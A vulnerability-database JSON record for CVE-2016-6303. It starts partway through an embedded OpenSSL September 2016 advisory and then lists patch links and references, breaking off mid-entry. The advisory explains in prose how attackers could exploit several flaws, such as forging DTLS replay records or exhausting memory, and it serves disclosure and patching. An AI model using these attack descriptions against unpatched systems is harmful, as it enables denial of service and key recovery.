(Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "BID", "id": "92984" }, { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "PACKETSTORM", "id": "140151" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-6303", "trust": 3.3 }, { "db": "BID", "id": "92984", "trust": 2.0 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "SECTRACK", "id": "1036885", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004782", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201609-320", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-6303", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140151", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "BID", "id": "92984" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "PACKETSTORM", "id": "140151" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "id": "VAR-201609-0348", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3797576935714285 }, "last_update_date": "2023-12-18T11:08:34.796000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Security updates for all active release lines, September 2016", "trust": 0.8, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "title": "Avoid overflow in MDC2_Update()", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=55d83bf7c10c7b205fffa23fa7c3977491e56c07" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Bug 1370146", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1370146" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "TLSA-2016-28", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-28j.html" }, { "title": "OpenSSL\u0027MDC2_Update\u0027 Fixes for function integer overflow vulnerability", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=64116" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-6303" }, { "title": "Red Hat: CVE-2016-6303", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-6303" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6303 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "NVD", "id": "CVE-2016-6303" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/92984" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1370146" }, { "trust": 1.7, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036885" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=55d83bf7c10c7b205fffa23fa7c3977491e56c07" }, { "trust": 0.9, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=55d83bf7c10c7b205fffa23fa7c3977491e56c07" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6303" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6303" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.7, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009586" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1009648" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21985392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992427" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992681" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996181" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000242" }, { "trust": 0.2, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6303" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7413" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1823" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7602" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7414" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7588" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7416" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5419" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4691" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7141" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4693" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5420" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7591" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4688" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7596" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7603" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1777" }, { "trust": 0.1, "url": "https://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7594" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7595" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7418" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7167" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7604" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7600" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": 